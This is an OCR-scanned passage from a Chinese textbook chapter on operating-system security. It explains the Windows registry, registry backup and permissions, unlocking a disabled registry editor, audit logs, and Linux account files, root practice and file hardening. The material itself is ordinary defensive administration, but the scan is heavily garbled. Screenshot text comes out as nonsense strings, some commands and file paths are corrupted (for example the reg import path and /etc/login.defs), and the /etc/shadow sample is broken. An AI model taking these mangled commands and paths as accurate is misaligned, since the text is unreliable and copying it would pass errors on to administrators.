注册 表 采 用 “关键 字 ” 及 其 “ 键 值 ”来 描述 记录 项 及 其 数据 。 所 有 的 关键 字 都 是 以 
HKEY 作为 前 缀 开头 。 实 际 上 ， 关 键 字 是 一 个 句柄 。 这 种 约定 使 得 应 用 程序 开发 人 员 可 以 
在 使 用 注册 表 API 时 把 它 用 于 程序 之 中 。 为 此 ，Windows 提供 了 若干 API 函数 ， 以 便 在 开 
发 Windows 应 用 程序 时 添加 、 修 改 、 查 询 和 删除 注册 表 的 记录 项 。 关 键 字 可 以 分 为 两 类 : 
一 类 是 由 系统 定义 的 ， 通 常 称 为 “预定 义 关键 字 ”; 另 一 类 是 由 应 用 程序 定义 的 ， 安 装 的 
应 用 软件 不 同 ， 其 记录 项 也 就 不 同 。 在 注册 表 编 辑 器 ( 见 图 6-16) 中 可 以 很 方便 地 添加 、 修 
改 、 查 询 和 删除 注册 表 的 每 一 个 关键 字 。 注 册 表 编辑 器 采用 树 形 结构 组 织 注 册 表 中 的 数 
据 ， 可 以 将 注册 表 里 的 内 容 分 为 树枝 和 树叶 ， 树 枝 下 可 以 有 多 个 树枝 ， 也 可 以 有 多 个 树 
叶 。 树 枝 叫 作 “ 键 ”， 树 叶 叫 作 “ 键 值 ”。 键 值 包括 3 部 分 : 值 的 名 称 、 值 的 数据 类 型 和 
值 本 身 。 可 以 在 “开始 ”一 “运行 ”对 话 框 中 输入 命令 regedit 来 打开 注册 表 编辑 器 。 


TIET 
己 局 我 的 电 及 


名 称 天 型 


四 国 EY_CLASSES_ROOT 国共 内 BEG_SZ 
田园 WieY CRRENT_VSER 辆 mootasbl。 BE6_DMORD 


由 国 JIET_LOCAL_IACIDE 








我 的 电脑 \IIEY_CURRPNT_CONFIG\SeftwareMli erosoftVwindows\Carrentyarsion\Internet Settings 


6-16 ”注册 表 编辑 器 


Windows 系统 的 注册 表 一 般 预 定义 有 5 个 主 关键 字 ， 其 描述 如 表 6-9 所 示 。 


主 关键 字 


表 6-9 注册 表 预 定义 主 关键 字 


描 述 





HKEY_CLASSES ROOT 


HKEY _ CURRENT USER 


是 HREY LOCAL MACHINE\SOFTWARE 的 子 键 。 此 处 存储 的 信 
息 可 以 确保 当 使 用 Windows 资源 管理 器 打开 文件 时 ， 将 打开 正确 的 
关联 程序 

包含 当前 登录 用 户 的 配置 信息 。 用 户 文件 夹 、 屏 幕 颜 色 和 控制 面板 
设置 存储 在 此 处 。 该 信息 被 称 为 用 户 配置 文件 





HKEY LOCAL MACHINE 


包含 针对 该 计算 机 (对 于 任何 用 户 ) 的 配置 信息 





HKEY_USERS 


包含 计算 机 上 所 有 用 户 的 配置 文件 。HKEY CURRENT USER 是 
HKEY USERS 的 子 键 





HKEY CURRENT CONFIG 
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包含 本 地 计算 机 在 系统 启动 时 所 用 的 硬件 配置 文件 信息 
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注册 表 键 值 项 数据 可 分 为 6 种 类 型 ， 如 表 6-10 所 示 。 
表 6-10 ”注册 表 的 数据 类 型 

















数据 类 型 描 述 
REG BINARY 原始 二 进 制 数据 
REG DWORD 数据 由 4 字 节 长 的 数 表示 
REG EXPAND SZ 长 度 可 变 的 数据 串 
REG MULTI SZ 多 重 字符 串 
REG SZ 固定 长 度 的 文本 字符 串 
REG FULL RESOURCE DESCRIPTOR 一 系列 嵌 套 数组 


2. 注册 表 的 备份 与 恢复 


修改 注册 表 配 置 可 以 改善 系统 性 能 、 增 强 系统 安全 性 。 但 是 ， 由 于 注册 表 中 存放 的 某 
些 信 息 对 系统 运行 来 说 是 至 关 重 要 的 ， 一 旦 在 修改 过 程 中 出 现 误 操 作 ， 有 可 能 带 来 致命 的 
问题 ， 所 以 在 修改 注册 表 之 前 一 定 要 先 备 份 。 只 有 做 了 备份 ， 才 能 在 因为 修改 注册 表 而 导 
致 系统 出 现 问题 时 ， 使 用 注册 表 的 恢复 功能 来 恢复 系统 到 正常 的 状态 。 

注册 表 的 备份 和 恢复 的 具体 步骤 如 下 。 

(1) 在 “运行 ”对 话 框 中 输入 命令 regedit， 打 开 注 册 表 编辑 器 。 

(2) 在 出 现 的 “注册 表 编 辑 器 ”窗口 中 选择 “文件 ”一 “导出 ”菜单 命令 ， 如 图 6-17 
所 示 。 


和 名称 EE 
国民 REG_SZ 
国 ProxyEnatle REG_DWORD 


连接 网 络 注册 表 C)， 


打印 中) 
退出 芭 ) 








图 6-17 选择 “导出 ”菜单 命令 


(3) 在 “导出 注册 表 文 件 ” 对 话 框 中 选择 存放 注册 表 备 份 文件 的 位 置 并 且 输 入 保存 文 
件 的 名 称 ， 然 后 单 击 “ 保 存 ” 按 钮 ， 一 个 注册 表 备 份 文件 便 生 成 了 。 

(4) 若 要 利用 刚才 生成 的 注册 表 备 份 文件 来 恢复 注册 表 ， 可 在 “注册 表 编 辑 器 ”窗口 
中 选择 “文件 ”一 “导入 ”菜单 命令 。 

(5) 在 出 现 的 “导入 注册 表 文 件 ” 对 话 框 中 定位 到 存放 注册 表 备 份 文件 的 位 置 ， 选 择 
已 经 备份 好 的 注册 表 文 件 ， 单 击 “打开 ”按钮 即 可 ， 如 图 6-18 所 示 。 
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图 6-18 “导入 注册 表 文 件 ”对 话 框 
3. 注册 表 的 访问 控制 


注册 表 中 包含 有 关 计 算 机 及 其 应 用 程序 和 文件 的 敏感 信息 ， 恶 意 用 户 或 程序 可 以 通过 
修改 注册 表 来 达到 破坏 计算 机 的 目的 。 因 此 ， 注 册 表 的 高 度 安全 是 至 关 重要 的 。 默 认 情 况 
下 ， 注 册 表 的 安全 级 别 是 比较 高 的 。 只 有 管理 员 对 整个 注册 表 拥 有 完全 访问 权限 ， 一 般 用 
户 无 权 访 问 与 其 他 用 户 账户 相关 的 注册 表 项 。 对 给 定 注册 表 项 拥有 适当 权限 的 用 户 可 以 修 
改 该 项 及 其 子 项 的 权限 。 给 注册 表 项 指派 权限 的 具体 操作 步骤 如 下 。 

(1) 在 “运行 ”对 话 框 中 输入 命令 regedit 来 打开 注册 表 编 辑 器 。 

(2) 在 注册 表 编辑 器 中 选 定 准备 指派 权限 的 项 。 

(3) 选择 “编辑 ”一 “权限 ”菜单 命令 ， 打 开 权 限 设置 对 话 框 ， 如 图 6-19 所 示 。 


钥 或 用 户 名 称 G): 
Admini strator (ADMIN-DS4ABSADA\Adninistrator) 
hdministrators (ADNIN-DS4ABS4DA\Adninistrators 
BR CREATOR om 
RPower Users (ADMIN-DS4AB54DA\Power Users) 羡 

< > 








添加 @). ] [ 删除 @) ]】 
允许 拒绝 








Adninistrator 的 权限 下) 





特别 权限 或 高 然 设置 ,请 单 击 “ 高 级 ”。 
CC 骏 ]L an |] 
图 6-19 注册 表 的 权限 设置 


(4) 选择 用 户 或 组 ， 并 给 其 指派 访问 权限 。 
®@ ”要 授予 用 户 读 取 该 项 内 容 的 权限 ， 但 不 保存 对 文件 的 修改 ， 应 选中 “ 读 取 ” 栏 的 
“允许 ” 复 选 框 。 
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@ ”要 授予 用 户 打 开 、 编 辑 所 选项 和 获得 所 有 权 的 权限 ， 可 选中 “完全 控制 ” 栏 的 
“人 允许” 复 选 框 。 
@ ”要 授予 用 户 对 所 选项 的 特别 权限 ， 单 击 “ 高 级 ”按钮 。 
(5) 如 果 要 给 子 项 指派 权限 ， 并 希望 指派 给 父 项 的 可 继承 权限 能 够 应 用 于 子 项 ， 应 单 
击 “ 高 级 ”按钮 并 选中 “从 父 项 继承 那些 可 以 应 用 到 子 对 象 的 权限 项 目 ， 包 括 那 些 在 此 明 
确定 义 的 项 目 ” 复 选 框 ， 如 图 6-20 所 示 。 
Internet Settings 的 高 级 安全 设置 


入 限 ”| 审核 | 所 有 者 | 有效 权限 
| 要 想 查 看 有 关 “特殊 权限 ”的 洋 细 信 息 ,请 选择 一 个 权限 项 目 ,然后 单 击 “ 编 辑 ”。 





和 


CONFIG\Soft. 


回 从 父 项 继承 那些 可 以 应 用 到 子 对 象 的 权限 项 目 ， 包 括 那些 在 此 明确 定义 的 项 目 区) 
口 用 在 此 显示 的 可 以 应 用 到 子 对 象 的 项 目 普 代 所 有 子 对 象 的 权限 项 目 中 ) 























| mw | 








6-20 高 级 安全 设置 


4. 注册 表 的 解锁 


对 于 注册 表 的 安全 ， 除 了 需要 掌握 注册 表 的 备份 与 恢复 、 注 册 表 的 访问 控制 这 两 项 基 
本 措施 以 外 ， 掌 握 注册 表 的 解锁 操作 也 是 一 项 基本 技能 。 因 为 
现在 的 一 些 恶 意 程序 修改 不 仅仅 修改 注册 表 ， 而 且 为 了 防止 恢 
复 注册 表 会 禁止 使 用 注册 表 。 当 执行 regedit 命令 时 ， 系 统 会 弹 
出 一 个 提示 对 话 框 : “注册 编辑 已 被 管理 员 停 用 。” 这 时 注册 
表 编 辑 器 已 被 锁定 ， 如 图 6-21 所 示 。 

解锁 注册 表 有 以 下 两 种 方法 。 

1) 利用 注册 表 文 件 解锁 注册 表 

(1) 针对 Windows 2000/2003/2008 系统 

@ 选择 “开始 ”一 “程序 ”一 “附件 ”一 “记事 本 ”菜单 命令 。 

@ 在 记事 本 窗口 中 输入 以 下 内 容 : 

Windows Registry Editor Version 5.00 


[HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\Policies\ 
System] "DisableRegistryTools"=dword:00000000 


@ 选择 “文件 ”一 “保存 ”菜单 命令 ,设置 “保存 类 型 ”为 所 有 文件 ， 保 存 到 C 
文件 名 为 123.reg。 
@ 打开 资源 管理 器 ， 切 换 到 C 盘 ， 双 击 123 reg 文件 。 





图 6-21 注册 表 被 锁定 


和 
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@ 系统 弹出 “是 否 确认 要 将 Ci\123.reg 中 的 信息 添加 进 注册 表 ” 对 话 框 ， 单 击 
“是 ”按钮 。 

@ 随后 弹出 对 话 框 “C:\reg.reg 里 的 信息 已 被 成 功 地 输入 注册 表 ”， 表 明 导 入 成 功 。 

(2) 针对 Windows XP/Windows 7 系统 

@ 选择 “开始 ”一 “程序 ”一 “附件 ”一 “记事 本 ”菜单 命令 。 

@ 在 记事 本 窗口 中 输入 以 下 内 容 : 

Windows Registry Editor Version 5.00 


[HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\Policies\Sy 
stem] "DisableRegistryTools"=dword:00000000 


狼 注意 ; 第 一 行 下 面 有 一 个 空 行 。 所 有 内 容 输 完 后 请 再 输入 一 个 空 行 ， 即 在 
dword:00000000 后 面 新 建 一 个 空 行 。 
@ 选择 “文件 ”一 “保存 ”菜单 命令 ， 设 置 “ 保 存 类 型 ”为 所 有 文件 ， 文 件 名 为 1 。 
@ 打开 “运行 ”对 话 框 ， 如 文件 保存 在 C:\reg 文件 夹 下 ， 那 么 就 输入 reg import 
ceg\lreg 命令 。 
性 注意 : 如 果 文 件 路 径 或 文件 名 中 有 空格 ， 则 在 路 径 和 文件 名 两 边 加 上 引号 ， 如 reg 
import "c:\reg\l .reg"。 
2) 利用 组 策略 解锁 注册 表 


(1) 在 Windows 2003/7/2008 中， 打开“ 运行” 对 话 框 ， 输 入 Gpedit.Msc 命令 后 按 
Enter 键 ， 打 开 “ 组 策略 ”窗口 ， 如 图 6-22 所 示 。 


文件 EE) ” 换 作 必 ) 查看 WW 帮助 0 


香 “ 本 地 计算 机 ”策略 


选择 一 个 项 目 来 查看 它 的 描述 。 











图 6-22 “组 策略 ”窗口 


(2) 在 “组 策略 ”窗口 中 ， 依 次 展开 “用 户 配置 ”一 “管理 模板 ”一 “系统 ”分 支 ， 
双击 右 侧 窗 格 中 的 “阻止 访问 注册 表 编 辑 工具 ”选项 ， 如 图 6-23 所 示 。 
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文件 操作 9) 查看 外 帮助 人 0 
和 二 四 轿 | 狼 忆 多 
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6-23 “阻止 访问 注册 表 编 辑 工 具 ” 选 项 


(3) 在 弹出 的 对 话 框 中 选中 “已 禁用 ” 单 选 按 钮 ， 单 击 “ 确 定 ” 按 钮 ， 即 可 为 注册 表 
解锁 ， 如 图 6-24 所 示 。 


朋 止 访问 注册 表 编辑 工具 属性 
设置 “| 说 明 
外 阻止 访问 注册 表 编 辑 工具 
OC) 
OBB 有 E) 
©ER 有 ED 
禁用 后 台 运 行 regedit? 





支持 于 : 至 少 Microsoft Windows 2000 
上 一 设置 FE)  ] L_ 下 一 于 中 




















[本 | | Wr 
图 6-24 “阻止 访问 注册 表 编 辑 工具 ”属性 





6.2.4 ”审核 与 日 志 


要 维护 真正 安全 的 环境 ， 只 是 具备 安全 系统 还 远 远 不 够 。 如 果 总 假设 自己 不 会 受到 攻 
击 ， 或 认为 防护 措施 已 足以 保护 自己 的 安全 ， 都 将 非常 危险 。 要 维护 系统 安全 ， 必 须 进 行 
主动 监视 ， 以 检查 是 否 发 生 了 入 侵 和 攻击 。 

Windows 安全 审核 可 以 用 日 志 的 形式 记录 与 安全 相关 的 事件 ， 可 以 使 用 其 中 的 信息 来 
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生成 一 个 有 规律 活动 的 概要 文件 ， 发 现 和 跟踪 可 疑 事件 ， 并 留 下 关于 某 一 入 侵 者 活动 的 有 
效 证 据 。Windows 2000/XP/2003 系统 提供 了 9 类 可 以 审核 的 事件 (如 图 6-25 所 示 )， 对 于 每 
一 类 都 可 以 指明 是 审核 成 功 事 件 、 审 核 失败 事件 ， 还 是 两 者 都 审核 (如 图 6-26 所 示 )。 


审核 帐户 管理 属性 





[ 鸭 审核 第 略 
由 国 用 户 权利 指派 


遇 国 安全 项 
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由 久 [网 RR 权 人 用 
由 晶 I 安全 策略 ,在 本 地 i | 国 审 术 系 直 事 御 无 审核 
市 术 帐户 杂事 侠 ”无 
现 二 由 P 营 理 


< 








CD CR CR 
图 6-25 ”Windows 审核 事件 图 6-26 ”Windows 审核 操作 


审核 事件 和 审核 操作 可 以 通过 进入 系统 的 “控制 面板 ”一 “管理 工具 ”一 “本 地 安全 
策略 ”一 “审核 策略 ”进行 设置 。 

设置 了 审核 策略 后 ， 审 核 所 产生 的 结果 都 被 记录 到 日 志 中 ， 所 以 日 志 记录 了 审核 策略 
监控 的 事件 成 功 或 失败 执行 的 信息 。 为 了 便于 管理 ， 日 志 被 分 为 6 种 ， 分 别 是 应 用 程序 日 
志 、 系 统 日 志 、 安 全 日 志 、 目 录 服 务 日 志 、 文 件 复制 日 志和 DNS 服务 日 志 。 前 3 种 是 所 
有 安装 了 Windows 2003/7/2008 的 系统 都 存在 的 ， 而 后 3 种 则 仅 当 安 装 了 相应 的 服务 后 才 
会 被 提供 。 

使 用 事件 查看 器 可 以 查看 日 志 的 内 容 ， 基 本 步骤 如 下 。 

(1) 选择 “开始 ”一 “程序 ”一 “管理 工具 ”一 “事件 查看 器 ”菜单 命令 ,打开 事件 
查看 器 。 

(2) 在 事件 查看 器 左 侧 窗 格 中 选择 “安全 性 ”， 则 在 右 侧 的 窗 格 中 显示 日 志 的 条 目 列 
表 ， 以 及 每 一 条 日 志 的 摘要 信息 ， 包 括 日 期 、 事 件 、 来 源 、 分 类 、 用 户 和 计算 机 名 。 成 功 
的 事件 前 显示 一 个 钥 是 图标， 而 失败 的 事件 显示 锁 的 图 标 ， 如 图 6-27 所 示 。 

a 查看 帮助 0 


小 外国 | 团 国 民 久 
| 加 事件 喜 看 器 林地) 安全 性 5 个 事件 




















2008-2-22 14:24:19 








图 6-27 事件 查看 器 


(3) 如 果 想 查看 某 一 条 日 志 的 详细 信息 ， 双 击 该 项 日 志 ; 或 是 选择 一 条 日 志 后 ， 选 择 
“操作 ”一 “属性 ”菜单 命令 。 
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(4) 如 果 要 查看 某 一 指定 类 型 的 事件 ， 某 一 时 间 段 内 发 生 的 事件 ， 或 是 某 一 用 户 的 事 
件 ， 就 需要 运用 事件 查看 器 的 查找 功能 。 事 件 查看 器 的 查找 对 话 框 如 图 6-28 所 示 。 
(5) 如 果 想 在 事件 查看 器 的 事件 列表 窗 格 中 只 列 出 符合 相应 条 件 的 事件 ， 这 时 需 用 筛 


选 功能 ， 事 件 查看 器 的 筛选 对 话 框 如 图 6-29 所 示 。 


在 本 地 安全 性 上 查找 


Omrw OnTw 


还 原 默 认 值 E) 





图 6-28 ”查找 审核 事件 
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从 四 : [第 一 个 事件 
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图 6-29 ”筛选 审核 事件 


(6) 随 着 审核 事件 的 不 断 增加 ， 安 全 日 志文 件 的 大 小 也 不 断 增加 。 当 安全 日 志文 件 的 
大 小 达到 其 极限 时 ， 其 后 发 生 的 安全 事件 将 无 法 记录 到 日 志 当中 。 因 此 ， 安 全 日 志文 件 大 
小 的 设置 也 至 关 重要 ， 可 以 通过 类 似 于 如 图 6-30 所 示 的 对 话 框 进行 设置 。 


CC \WINDONS\Sys ten32\ confie\SecEvent. Evt 


64.0 码 (65,538 字 节 ) 
2007 年 11 月 6 日 16:02:45 
2007 年 11 月 6 日 16:02:45 
2008 年 2 月 22 日 11:43:52 


当 达 到 | 最 大 的 日 志 大 小 时 


癌 按 筑 要 改写 事件 上 ) 
©msA 于 VW 


° i 


口 合 用 低速 连接 仙 











图 6-30 日志 文件 属性 


在 Windows 系统 中 使 用 审核 策略 ， 虽 然 不 能 对 用 户 的 访问 进行 控制 ， 但 是 管理 员 通过 
及 时 查看 日 志 ， 可 以 了 解 系统 在 哪些 方面 存在 安全 隐患 ， 从 而 采取 相应 的 措施 ， 将 系统 的 


不 安全 因素 降 到 最 低 。 
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6.3 Linux 的 安全 技术 


Linux 是 一 个 开放 式 系 统 。 一 方面 ，Linux 系统 的 开放 特性 使 得 它 能 从 研发 者 那里 获 益 
良 多 ， 得 到 更 多 有 关 安 全 漏洞 的 信息 和 建议 ， 而 不 至 于 像 一 些 只 考虑 经 济 利益 的 开发 商 那 
样 对 安全 问题 漠不关心 。 另 一 方面 ，Linux 又 是 自己 成 功 的 牺牲 者 ， 它 可 以 运行 大 量 的 开 
放 性 应 用 程序 ， 这 既 方便 了 用 户 ， 也 方便 了 黑客 ， 因 为 黑客 很 容易 就 能 找到 程序 和 工具 来 
潜入 Linux 系统 、 盗 取 Linux 系统 上 的 重要 信息 。 因 此 ， Linux 系统 的 安全 问题 要 足够 重 
视 ， 要 仔细 地 设 定 Linux 的 各 种 系统 功能 ， 并 且 加 上 必要 的 安全 措施 ， 使 黑客 无 可 乘 
之 机 。 


6.3.1 账号 安全 


账号 安全 属于 Linux 系统 安全 的 “外 层 ” 安 全 ， 防 护 的 基准 目标 是 确保 用 户 名 和 口令 
能 够 保护 系统 。 


1. Linux 用 户 登 录 过 程 


与 Windows 系统 一 样 ，Linux 系统 同样 通过 用 户 ID 和 口令 的 方式 来 登录 系统 。 通 过 
终端 登录 Linux 的 过 程 描述 如 下 : 

(1) init fork( 初 始 化 过 程 生成 ) 一 个 新 的 进程 ， 调 用 执行 /sbin/getty。 

(2) getty 在 终端 上 输出 一 条 欢迎 信息 ， 并 提示 输入 用 户 名 。 

(3) 用 户 输入 用 户 名 后 ，getty 读 取 用 户 名 ， 最 后 调用 执行 /bin/login 命令 。 

(4) login( 登 录 ) 得 到 作为 参数 传 入 的 用 户 名 后 ， 提 示 输 入 口令 通知 。 

(5) login 读 取 口令 后 ， 与 /etc/passwd 口令 文件 匹配 ， 若 匹配 不 成 功 ， 则 中 断 整个 登录 
进程 。 若 匹配 成 功 ， 则 根据 /etc/passwd 文件 中 的 定义 加 载 shell 环境 。 


2. Linux 主要 账号 管理 文件 


在 Linux 系统 中 ， 用 户 账号 的 基本 信息 存放 在 文件 etc/passwd 中 ， 每 个 用 户 的 信息 在 
此 文件 中 占 一 行 ， 由 7 个 域 组 成 ， 具体 结构 如 下 。 


Name:coded-passwd:UID:GID:user-Info:home-directory:shell 


7 个 域 中 的 每 一 个 由 冒号 隔 开 。 空 格 是 不 允许 的 ， 除 非 在 user-Info 域 中 使 用 。 下 面 总 
结 了 每 个 域 的 含义 。 

(1) Name: 为 给 用 户 分 配 的 用 户 名 ， 这 不 是 私有 信息 。 

(2) coded-passwd: 经 过 加 密 的 用 户口 令 。 如 果 一 个 系统 管理 员 需 要 阻止 一 个 用 户 登 
录 ， 则 经 常用 一 个 星 号 (: *: ) 代 替 。 该 域 通常 不 手工 编辑 ， 一 般 使 用 passwd 命令 修改 口 
令 。 如 果 该 域 显示 的 是 一 个 x*， 则 表示 密码 已 被 映射 到 /etc/shadow 文件 中 ， 并 不 保存 在 
etc/passwd 文件 中 ， 这 是 出 于 安全 性 的 考虑 。 

(3) UID: 用 户 的 唯一 标识 号 。 习 惯 上 ， 小 于 100 的 UID 是 为 系统 账号 保留 的 。 

(4) GID: 用 户 所 属 的 基本 分 组 。 通 常 它 将 决定 用 户 创建 文件 的 分 组 拥有 权 。 在 Red 


116 人 \. 


第 6 章 操作 示 统 安全 介 国 国 归 归 
Hat Linux 中 ， 每 个 用 户 账号 被 默认 赋予 一 个 唯一 分 组 。 


(5) user-Info: 对 用 户 的 一 些 解释 说 明 ， 这 是 可 选 的 ， 习 惯 上 它 包 括 用 户 的 全 名 。 

(6) home-directory: 该 域 指明 用 户 的 起 始 目录 ， 它 是 用 户 登录 进入 后 的 初始 工作 目录 。 

(7) shell: 该 域 指明 用 户 登录 进入 后 执行 的 命令 解释 器 所 在 的 路 径 。 有 多 种 Shell 可 
选 ， 包 括 Bourne ShellUbin/sh) ，C Shell(/bin/csh), Kor Shell(/bin/ksh) 和 Bash 
Shell(/bin/bash)。 可 以 为 用 户 在 该 域 中 赋 一 个 /bin/false 值 ， 这 将 阻止 用 户 登 录 。 

例如 ， 下 面 的 etc/passwd 条 目 : 


zhouzhou:x:513:100:zhaozhenzhou:/home/zhouzhou: /bin/bash 


指出 用 户 zhaozhenzhou 的 用 户 名 为 zhouzhou， 密 码 被 映射 到 etc/shadow 文件 中 ，UID 
为 513，GID 为 100， 起 始 目录 为 /home/zhouzhou， 把 Bash Shell 作为 默认 的 Shell。 

为 了 提高 用 户 密码 存放 的 安全 性 ， 现 在 的 Linux 系统 普遍 使 用 了 shadow 技术 ， 将 加 
密 后 的 密码 存放 在 /etc/shadow 文件 中 ， 而 /etc/passwd 文件 中 的 密码 域 只 保存 一 个 x。 
/etc/shadow 文件 的 每 行内 容 包括 9 个 字段 ， 相 邻 字段 之 间 用 冒号 分 隔 。 

@ 用 户 名 。 

@ 加 密 口令 。 

@ 上 一 次 修改 口令 的 日 期 以 从 1970 年 1 月 1 日 开始 的 天 数 表示 。 

@ ”口令 在 两 次 修改 间 的 最 小 天 数 。 口 令 在 建立 后 必须 更 改 的 天 数 。 

@ 口令 更 改 之 前 向 用 户 发 出 警告 的 天 数 。 

@ 口令 终止 后 账号 被 禁用 的 天 数 。 

@ 自从 1970 年 1 月 1 日 起 账号 被 禁用 的 天 数 。 

@ 保留 域 。 

图 6-31 是 一 个 Red Hat Linux 系统 中 /etc/shadow 文件 的 例子 : 


root:$1$mDLOKIVWV) 8BTdiT/6RM lqTcLGe1/:13950:0:99999:7:;:: 
bin:*:13950:0:99999:7::: 


adm *; 13950 

lp:*:13950: 
syne:*:1395 
shutdown: *:13950: 
halt:*:13950:0:99999 
mail:*:13950:0:99999 












gopher:*#:13950 : 
ftp:*;13950:0:99999: 

nobody:*#:13950:0:999 
rpm !!:13950:0:99999 
















nscd 50: 0:99999:7 
sshd :13950:0:99999:7 
rpe: 3950:0:99999:7::: 





人 0:99999:7: 
“shadow” 浴 活 ][ 转 六] 51L， 1505C 


图 6-31 /etc/shadow 文件 


PY @ er 


shadow 文件 对 于 一 般 用 户 是 不 可 读 的 ， 只 有 超级 用 户 (roob 才 可 以 读 写 。 这 样 ， 对 一 
般 用 户 就 无 法 得 到 加 密 后 的 口令 ， 提 高 了 系统 的 安全 性 。 

上 述 两 个 与 用 户 和 密码 相关 的 配置 文件 是 不 能 直接 修改 的 ， 必 须 通过 相应 的 命令 才能 
进行 更 改 。passwd 和 change 是 专门 用 于 实现 密码 安全 策略 的 两 个 命令 ， 具 体 使 用 方法 在 
此 不 做 介绍 ， 请 读者 查询 帮助 自学 。 

3. 账号 /口令 安全 设置 


1) 默认 账号 

所 有 的 Linux 系统 在 都 有 一 些 默认 账号 ， 如 果 这 些 账号 是 用 户 所 不 需要 的 ， 建 议 把 它 
们 禁用 或 删除 。 因 为 系统 中 的 账号 越 多 ， 被 攻击 的 可 能 性 就 越 大 。 

可 以 在 etc/passwd 文 件 的 口令 域 中 的 账户 之 前 加 一 个 “ *” 来 达到 禁用 账户 的 目的 。 
删除 账号 可 以 使 用 userdel 命令 。 

2) root 账号 

root 账号 是 Linux 系统 中 享有 特权 的 账号 ， 其 不 受 任何 限制 和 制约 。 系 统管 理 员 在 以 
root 或 超级 用 户 进行 操作 时 ， 要 注意 以 下 原则 。 

(1) 除非 必要 ， 避 免 以 超级 用 户 登 录 。 

(2) 如 果 必 须 以 root 操作 ， 首 先 以 自己 身份 登录 ， 然 后 使 用 /bin/su - 来 成 为 root。 

(3) 不 要 随意 地 把 root shell 留 在 终端 上 。 

(4) 不 要 把 root 口令 给 不 信任 的 人 或 不 是 十 分 需要 的 人 。 

(5) 如 果 某 人 确实 需要 以 root 来 运行 命令 ， 则 考虑 安装 并 使 用 sudo 这 样 的 工具 ， 它 能 
使 普通 用 户 以 root 来 运行 个 人 命令 并 维护 日 志 。 

(6) 永远 不 要 把 当前 目录 (“，”) 放 到 root 账号 的 搜索 路 径 中 。 不 要 把 普通 用 户 的 bin 
目录 放 到 root 的 搜索 路 径 中 。 不 要 使 任何 人 作为 超级 用 户 趁 人 不 注意 执行 特洛伊 木马 
程序 。 

(7) 永远 不 以 root 运行 其 他 用 户 的 或 不 熟悉 的 程序 。 

(8) 当 使 用 su 命令 成 为 超级 用 户 时 ， 用 全 路 径 名 /bin/su 来 调用 ， 而 不 是 su， 这 是 为 了 
防止 一 个 特洛伊 木马 su 程序 被 用 来 偷窃 root 口令 。 最 好 是 使 用 “/bin/su-” 形 式 ， 额 外 的 
“-” 保 证 以 有 效 的 用 户 ID 要 求 切换 到 root 环境 中 。 

3) 口令 文件 

不 可 改变 位 可 以 用 来 保护 文件 ， 使 其 不 被 意外 地 删除 或 重 写 ， 也 可 以 防止 有 些 人 创建 这 
个 文件 的 符号 连接 。 删 除 “/etcpasswd”“/etc/shadow”“/etc/group” 或 “/etc/gshadow” 都 
是 黑客 的 攻击 方法 。 

给 口令 文件 和 组 文件 设置 不 可 改变 位 ， 可 以 用 下 列 命令 : 

[root@userl]#chattr +i /etc/passwd 

[root@userl]#chattr +i /etc/shadow 


[root@userl]#chattr +i /etc/group 
[root@userl]#chattr +i /etc/gshadow 


狂 注意 : ”如 果 将 来 要 在 口令 或 组 文件 中 增加 或 删除 用 户 ， 就 必须 先 清除 这 些 文件 的 不 
可 改变 位 ， 否 则 就 不 能 做 任何 改变 。 
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4) 口令 长 度 


Linux 系统 默认 最 短 口令 长 度 为 5 个 字符 ， 这 个 长 度 不 足以 保证 口令 的 健壮 性 ， 应 该 
改 为 最 短 8 个 字符 ， 编 辑 /etcllogin.defs 文件 ， 在 此 文件 中 , 将 “PASS _ MIN LEN 5” 改 
为 : “PASS MIN LEN8”。 


6.3.2 文件 系统 的 安全 


文件 系统 的 安全 是 Linux 系统 安全 的 核心 。Linux 文件 系统 控制 谁 能 访问 信息 以 及 他 
们 能 做 些 什么 。 即 使 外 层 账 号 安全 被 突破 ， 攻 击 者 也 还 必须 击败 文件 系统 根据 文件 拥有 权 
和 权限 精心 设置 的 防御 措施 。 

1. 文件 系统 的 结构 

为 了 维护 Linux 文件 系统 的 安全 ， 我 们 首先 介绍 一 下 Linux 文件 系统 的 结构 。 不 同 版 
本 的 Linux 文件 系统 的 结构 大 致 相同 ， 基 本 上 所 有 的 Linux 系统 都 包括 如 表 6-11 所 示 的 目 
录 结 构 。 

表 6-11 Linux 的 目录 结构 














目录 内 容 
/bin 用 户 命令 的 可 执行 文件 (二 进 制 ) 
/dev 特殊 设备 文件 
/ete 系统 执行 文件 、 配 置 文件 、 管 理 文件 ，Red Hat Linux 中 为 配置 文件 保留 ( 非 二 进 制 ) 
/home 用 户 起 始 目录 (/u, /users, /Users 是 可 选择 的 ) 
/lib 引导 系统 以 及 在 root 文件 系统 中 运行 命令 所 需 的 共享 库 文件 
/lost+found, 与 特定 文件 系统 断 开 连接 的 丢失 文件 
/mnt 临时 安装 的 文件 系统 (如 软驱 ，CD-ROM 等 ) 
/proc 一 个 伪 文 件 系统 ， 用 来 作为 到 内 核 数据 结构 或 正在 运行 的 进程 的 接口 (调试 时 很 有 用 
/sbin 只 被 root 使 用 的 可 执行 文件 以 及 那些 只 需要 引导 或 安装 /usr 的 文件 保留 
/tmp 临时 文件 
Pe 为 用 户 和 系统 命令 使 用 的 可 执行 文件 、 头 文件 、 共 享 库 、 帮 助 文件 、 本 地 程序 (在 /usr 
/local 中 ) 
/var 用 于 电子 邮件 、 打 印 、cron 等 的 文件 ， 统 计 文 件 ， 日 志文 件 
2. 文件 权限 


文件 权限 是 Linux 文件 系统 安全 的 关键 。Linux 是 一 个 多 用 户 系 统 ， 它 用 划分 的 方式 
来 控制 文件 访问 : 每 个 文件 属于 一 个 特定 用 户 和 分 组 ， 用 户 和 分 组 对 文件 或 目录 的 访问 是 
通过 权限 来 控制 的 。 

每 个 文件 和 目录 有 3 组 权限 与 之 相关 : 一 组 为 文件 的 拥有 者 (owner)， 一 组 为 文件 所 属 
分 组 的 成 员 (group)， 一 组 为 其 他 所 有 用 户 (others)。 
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每 组 权限 有 3 个 权限 标志 位 来 控制 以 下 权限 。 

(1) 可 读 D， 如 果 被 设置 ， 则 文件 或 目录 可 读 。 

(2) 可 写 Gw， 如 果 被 设置 ， 文 件 或 目录 可 以 被 写 入 或 修改 。 

(3) 可 执行 G9， 如 果 被 设置 ， 文 件 或 目录 可 以 被 执行 和 搜索 。 

如 图 6.32 所 示 ， 每 个 文件 或 目录 有 9 个 权限 位 。 
rWXI-X --- 

cm 

| 

其 他 用 户 访问 权 








分 组 访问 权 


